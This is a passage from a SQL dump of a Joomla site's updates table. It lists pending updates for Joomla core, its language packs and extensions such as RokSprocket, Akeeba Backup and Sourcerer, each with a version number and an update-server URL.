',''),(16082,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16083,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16084,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16085,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16086,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16087,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16088,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16089,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16090,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16091,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16092,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16093,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16094,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16095,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16096,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16097,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16098,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16099,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16100,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16101,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16102,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16103,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16104,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16105,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16106,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16107,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16108,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16109,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16110,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16111,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16112,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16113,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16114,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16115,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16116,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16117,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16118,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16119,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16120,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16121,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16122,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16123,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16124,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16125,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16126,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16127,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16128,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16129,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16130,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16131,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16132,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16133,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16134,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16135,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16136,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16137,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16138,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16139,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16140,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16141,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16142,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16143,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16144,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16145,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16146,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16147,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16148,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16149,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16150,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16151,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16152,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16153,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16154,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16155,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16156,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16157,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16158,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16159,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16160,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16161,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16162,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16163,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16164,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16165,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16166,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16167,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16168,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16169,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16170,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16171,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16172,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16173,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16174,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16175,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16176,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16177,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16178,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16179,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16180,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16181,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16182,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16183,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16184,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16185,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16186,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16187,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16188,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16189,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16190,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16191,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16192,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.12','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-12.html\n				',''),(16193,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16194,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(16196,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16197,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16198,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16199,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16200,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16201,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16202,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16203,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16204,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16205,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16206,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16207,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16208,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16209,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16210,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16211,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16212,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16213,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16214,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16215,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16216,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16217,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16218,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16219,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16220,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16221,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16222,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16223,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16224,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16225,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16226,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16227,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16228,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16229,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16230,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16231,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16232,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16233,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16234,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16235,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16236,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16237,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16238,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16239,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16240,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16241,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16242,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16243,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16244,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16245,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16246,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16247,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16248,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16249,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16250,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16251,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16252,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16253,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16254,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16255,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16256,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16257,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16258,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16259,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16260,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16261,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16262,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16263,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16264,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16265,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16266,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16267,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16268,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16269,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16270,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16271,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16272,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16273,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16274,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16275,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16276,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16277,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16278,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16279,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16280,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16281,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16282,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16283,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16284,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16285,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16286,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16287,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16288,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16289,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16290,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16291,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16292,57,0,'Chinese 